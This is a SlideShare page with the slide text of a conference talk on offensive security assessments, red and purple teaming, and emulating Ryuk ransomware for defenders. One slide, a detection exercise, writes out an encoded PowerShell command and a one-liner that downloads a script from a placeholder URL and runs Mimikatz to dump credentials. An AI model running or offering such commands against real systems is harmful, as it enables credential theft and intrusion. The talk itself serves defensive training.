SlideShare uma empresa Scribd logo

Evolution of Offensive Assessments - SecureWV Conference

Jorge Orchilles
Jorge Orchilles

https://www.scythe.io/library/threatthursday-ryuk Vulnerability Scanning Vulnerability Assessment Penetration Testing Red Team Purple Team Adversary Emulation Ransomware Consuming Cyber Threat Intelligence Emulating Ryuk Attack Infrastructure C2 Matrix RedELK

Tecnologia
1 de 40
Baixar para ler offline
@JorgeOrchilles EVOLUTION OF OFFENSIVE SECURITY
@JorgeOrchilles T1033 - System Owner/User Discovery ● Chief Technology Officer - SCYTHE ● Purple Team Exercise Framework (PTEF) ● C2 Matrix Co-Creator ● 10 years @ Citi leading offensive security team ● Certified SANS Instructor: SEC560, SEC504 ● Author SEC564: Red Team Exercises and Adversary Emulation ● CVSSv3.1 Working Group Voting Member ● GFMA: Threat-Led Pentest Framework ● ISSA Fellow; NSI Technologist Fellow 2
@JorgeOrchilles Evolution of Offensive Security https://www.scythe.io/library/scythes-ethical-hacking-maturity-model 3 ● Based on various organization’s experience ● Not a step-by-step guide, but could serve as a baseline for improvement ● You can skip steps based on business requirements and goals ● Every organization is different ● Continuous improvement should not halt previous assessment types
@JorgeOrchilles A Long, Long, Long Time Ago 4 1992 - First commercial firewall 2000 +/- - Firewalls are “common” Networks are flat Remember Windows 95 / NT? What was manual: ● Vulnerabilities in internet facing services (T1190) ● Abusing internet-facing authentication mechanisms (T1133, T1078)
@JorgeOrchilles Vulnerability Assessment 5 Vulnerabilities in internet facing services (T1190) Abusing internet-facing authentication mechanisms (T1133, T1078) + Severity
@JorgeOrchilles Penetration Testing 6 NOW with 100% MORE EXPLOITATION (and fire)
@JorgeOrchilles Attack Chain (simplified) 7 RECON Access Post-Access @brysonbort
@JorgeOrchilles Attack Chain 8 RECON Access Post-Access @brysonbort
@JorgeOrchilles General Business Value (simplified) 9 Business Value @brysonbort
@JorgeOrchilles 10 Exploitation in MITRE ATT&CK 9 techniques w/“exploit” (out of 525)
@JorgeOrchilles To summarize 11 Access
@JorgeOrchilles Cyber Defense Matrix 12 https://cyberdefensematrix.com/ @sounilyu
@JorgeOrchilles Red Team 13 Goal: ● Test, measure, and improve people, process, and technology ● Make Blue Team better ● Assure business once a year RECON Access Post-Access “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal
@JorgeOrchilles Red Team: Access 1. Exploitable vulnerabilities in internet facing services (T1190) 2. Abusing internet-facing authentication mechanisms (T1133, T1078) 3. Phishing for malware execution (T1192, T1193, T1194; phishing for credentials is really just #2 above) 4. Gaining physical access to a network and connecting a rogue device (T1200, T1091) 5. Supply Chain Attacks (T1195, T1199) 14 https://medium.com/@malcomvetter/how-we-breached-your-network-755e40f52d85
@JorgeOrchilles Red Team: Assumed Breach 15 RECON Access Post-Access Business Value @timmedin
@JorgeOrchilles Red Team: Coverage 16
@JorgeOrchilles Toward a Purple Team https://www.scythe.io/ptef
@JorgeOrchilles Purple Team Exercises 18 ● Virtual, functional team where teams work together to measure and improve defensive security posture (people, process, and technology) ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTPs) ○ Blue Team looks for indicators of behavior and/or improvement opportunities ○ Red and Blue work together to create remediation action plan ○ Repeat for next set of TTPs
@JorgeOrchilles Blue Team 19 ● Log ○ Relevant Events ○ Locally ○ Central Log Aggregator ● Alert ○ Severity ● Respond ○ Process ○ People ○ Automation ● Definition: ○ Defenders in an organization entrusted with identifying and remediating attacks. ○ Generally associated with Security Operations Center or Managed Security Service Provider (MSSP), Hunt Team, Incident Response, and Digital Forensics, Managed Detection and Response (MDR). ○ Really, it is everyone's responsibility! ● Goal: ○ Identify, contain, eradicate attacks
@JorgeOrchilles Single TTP? ● What is the expected Blue Team log, alert, and/or response from: ○ whoami - T1033; T1059.003 ○ ipconfig - T1016; T1059.003 ○ powershell whoami - T1033; T1059.001 ○ powershell -exec bypass -nop -enc dwBoAG8AYQBtAGkA - T1033; T1132.001; T1059.001 ○ powershell "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" - T1003; T1059.001; T1098; T1555; T1558 ● Each procedure can, and most likely will, include multiple TTPs ● Adversary is not going to just perform the one TTP ● Let’s chain these TTPs together to create an attack chain 20
@JorgeOrchilles Adversary Emulation ● Definition: ○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries. ○ Leverage Cyber Threat Intelligence to emulate an attacker likely to attack the organization ● Goal: ○ Emulate an adversary attack chain or scenario ○ Understand organization’s preparedness if under a real, sophisticated attack ● Effort: ○ Manual ● Customer: ○ Entire organization 21 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
@JorgeOrchilles #ThreatThursday ● Choose an adversary ○ Introduce Adversary and consume CTI ○ Map to MITRE ATT&CK w/Navigator Layer ○ Create Adversary Emulation Plan ○ Share the plan on SCYTHE Community Threat Github: https://github.com/scythe-io/community-threats/ ○ Emulate Adversary with video ○ How to defend against adversary ● All free for the community: https://www.scythe.io/threatthursday ● Let’s look at Ryuk: https://www.scythe.io/library/threatthursday-ryuk 22
@JorgeOrchilles 23
@JorgeOrchilles Ugh… Ransomware? Boring! But wait… $$ ● Get access to a target system or network (targeted or opportunist) ● Encrypt files - 3 methods: a. Read the file, create an encrypted version of the file, replace the original file with the encrypted one b. Use raw disk access for encryption c. Open the file, encrypt the contents and save the file (no file deletion or creation) ● Steal the files? Sometimes ● Download a ransom note asking for payment in crypto or else!!! ● Get PAID!!! $$$ ฿฿฿ ₿₿₿ 24
@JorgeOrchilles 25 Ransomware Operator Starter Pack
@JorgeOrchilles Consume CTI ● https://thedfirreport.com/2020/10/08/ryuks-return/ ● https://research.checkpoint.com/2018/ryuk-ransomware-targeted-campaign- break/ ● https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the -curious-case-of-ryuk-ransomware/ ● https://unit42.paloaltonetworks.com/atoms/ryuk-ransomware/ ● https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware- outbreak/ 26
@JorgeOrchilles Ryuk TTPs 27 Tactic Description Command and Control T1071 - Application Layer Protocol; T1105 - Ingress Tool Transfer; T1219 - Remote Access Software; T1573 - Encrypted Channel Execution T1059 - Command and Scripting Interpreter; T1059.001 - PowerShell; T1059.003 - Windows Command Shell; T1053 - Scheduled Task/Job; T1053.005 - Scheduled Task Defense Evasion T1078 - Valid Accounts; T1078.003 - Local Accounts; T1140 - Deobfuscate/Decode Files or Information Discovery T1018 - Remote System Discovery; T1057 - Process Discovery; T1082 - System Information Discovery; T1083 - File and Directory Discovery; T1087 - Account Discovery; T1087.002 - Domain Account; T1482 - Domain Trust Discovery Credential Access T1003 - OS Credential Dumping; T1003.001 - LSASS Memory Persistence T1547 - Boot or Logon Autostart Execution; T1547.001 - Registry Run Keys / Startup Folder Collection T1074 - Data Staged Exfiltration T1041 - Exfiltration Over C2 Channel Impact T1486 - Data Encrypted for Impact
@JorgeOrchilles ATT&CK Navigator 28
@JorgeOrchilles Attack Tools: C2 Matrix ● Collaborative Evaluation ● Google Sheet of C2s ○ 58 frameworks ● www.thec2matrix.com ● FOLLOW @C2_Matrix ● SANS Slingshot C2 Matrix 29
@JorgeOrchilles Attack Infrastructure with RedELK 30 ● RedELK - centralized logging for Red Team and White Cell ● Also amazing graph for this talk ->> ● https://github.com/outflan knl/RedELK/ ● Created by Marc/Outflank: ○ @MarcOverIP ○ @OutflankNL
@JorgeOrchilles Taskkill.bat 31
@JorgeOrchilles adf.bat ● Downloads AdFind.exe ○ Used by FIN6 and others ● Runs AdFind.exe as adf.bat ● Saves output to disk 32
@JorgeOrchilles 2 Hours Later… 33 https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/
@JorgeOrchilles Emulating Ransomware? ● Is emulating ransomware even possible? ● Of course it is! ● The secret is to not encrypt or destroy production data. ● Instead create new files before emulating typical ransomware steps of encrypting, exfiltrating, and obtaining a ransom note. ● This method ensures no data is ever at risk of being encrypted, destroyed, or leaked. 34
@JorgeOrchilles SHOW VALUE!!!! ● That is what we are here for… providing business value! ● Use VECTR to propose your Adversary Emulation Plan ● Track each engagement, each improvement, each blue team and red team win! ● Show improvement over time ● This will make you part of a Program including people, process, and technology 35 https://vectr.io/
@JorgeOrchilles Other considerations ● It's okay to deviate from plan to accomplish objective ● TTPs from MITRE ATT&CK are dated ○ Must be seen in the wild first; they can be years old ● Security tools/processes make some TTPs very difficult to pull off ○ This is okay, document the good and the bad ○ Give credit when and where due ● Avoiding Heartbeat Detection - 30 mins seems to be current magic # ● Everything done here today was with free tools ○ You may want to consider enterprise tools, for your enterprise. 36
@JorgeOrchilles More Free Stuff: Caldera https://github.com/mitre/caldera https://caldera.readthedocs.io/en/latest/ 37
@JorgeOrchilles Shameless Plugs ● Hands-On Purple Team Workshop - November 12 ○ Sign up: http://scythe.io/workshops ● SEC564 Live Online - https://sans.org/sec564 ○ HackFest - November 16-17 ● Purple Team Summit - November 13 ○ https://www.scythe.io/purple-team-summit 38
@JorgeOrchilles References 39 ● Ethical Hacking Maturity Model: https://www.scythe.io/library/scythes-ethical-hacking-maturity-model ● Definitions: https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Cyber Defense Matrix: https://cyberdefensematrix.com/ ● Purple Team Exercise Framework: https://www.scythe.io/ptef ● #ThreatThursday: https://www.scythe.io/threatthursday ● Ryuk: https://www.scythe.io/library/threatthursday-ryuk ● C2 Matrix: https://thec2matrix.com https://howto.thec2matrix.com ● RedELK: https://github.com/outflanknl/RedELK/ ● VECTR: https://vectr.io/ ● SCYTHE emulation plans: https://github.com/scythe-io/community-threats/ ● Caldera: https://github.com/mitre/caldera
@JorgeOrchilles@JorgeOrchilles Thank You! Any questions? 40

Recomendados

8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 MatrixJorge Orchilles
 
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerJorge Orchilles
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFJorge Orchilles
 
Purple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyPurple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyJorge Orchilles
 
Evolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootConEvolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootConJorge Orchilles
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersJorge Orchilles
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamerJorge Orchilles
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConJorge Orchilles
 

Recomendados

8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 MatrixJorge Orchilles
 
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerJorge Orchilles
 
Purple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFPurple Team Exercise Framework Workshop #PTEF
Purple Team Exercise Framework Workshop #PTEFJorge Orchilles
 
Purple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyPurple Team Use Case - Security Weekly
Purple Team Use Case - Security WeeklyJorge Orchilles
 
Evolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootConEvolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootConJorge Orchilles
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersJorge Orchilles
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamerJorge Orchilles
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConJorge Orchilles
 
KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityJorge Orchilles
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Jorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Jorge Orchilles
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatJorge Orchilles
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Jorge Orchilles
 
SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzJorge Orchilles
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Jorge Orchilles
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Jorge Orchilles
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixJorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpConJorge Orchilles
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework👀 Joe Gray
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixJorge Orchilles
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hackingVikram Khanna
 
DECEPTICONv2
DECEPTICONv2DECEPTICONv2
DECEPTICONv2👀 Joe Gray
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE - ATT&CKcon
 
Why is it so hard to make secure chips?
Why is it so hard to make secure chips?Why is it so hard to make secure chips?
Why is it so hard to make secure chips?Riscure
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02PacSecJP
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
 

Mais conteúdo relacionado

Mais procurados

KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityJorge Orchilles
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Jorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Jorge Orchilles
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatJorge Orchilles
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Jorge Orchilles
 
SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzJorge Orchilles
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Jorge Orchilles
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Jorge Orchilles
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixJorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpConJorge Orchilles
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixJorge Orchilles
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hackingVikram Khanna
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE - ATT&CKcon
 
Why is it so hard to make secure chips?
Why is it so hard to make secure chips?Why is it so hard to make secure chips?
Why is it so hard to make secure chips?Riscure
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 

Mais procurados (20)

KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive Security
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
 
SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim Schulz
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 Matrix
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hacking
 
DECEPTICONv2
DECEPTICONv2DECEPTICONv2
DECEPTICONv2
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
 
Why is it so hard to make secure chips?
Why is it so hard to make secure chips?Why is it so hard to make secure chips?
Why is it so hard to make secure chips?
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 

Semelhante a Evolution of Offensive Assessments - SecureWV Conference

Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02PacSecJP
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkLeszek Mi?
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Jennifer Burns
 
RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_ConclaveNSConclave
 
Simplifying Security: Protecting Your Clients and Your Company
Simplifying Security: Protecting Your Clients and Your CompanySimplifying Security: Protecting Your Clients and Your Company
Simplifying Security: Protecting Your Clients and Your CompanyDrew Gorton
 
Deep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloudDeep dive nella supply chain della nostra infrastruttura cloud
Deep dive nella supply chain della nostra infrastruttura cloudsparkfabrik
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 
Getting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionGetting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionJoe McCray
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
5 Things You Should Know About Ethical Hacking
5 Things You Should Know About Ethical Hacking5 Things You Should Know About Ethical Hacking
5 Things You Should Know About Ethical HackingKoenig Solutions Ltd.
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfssuser4237d4
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfssuser4237d4
 
Understanding and implementing website security
Understanding and implementing website securityUnderstanding and implementing website security
Understanding and implementing website securityDrew Gorton
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
Grow Up! Evaluating and Maturing Your SOC using MITRE ATT&CK
Grow Up! Evaluating and Maturing Your SOC using MITRE ATT&CKGrow Up! Evaluating and Maturing Your SOC using MITRE ATT&CK
Grow Up! Evaluating and Maturing Your SOC using MITRE ATT&CKMITRE ATT&CK
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesDaniel Bohannon
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
Jackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dJackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dAntonio Parata
 

Semelhante a Evolution of Offensive Assessments - SecureWV Conference (20)

Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
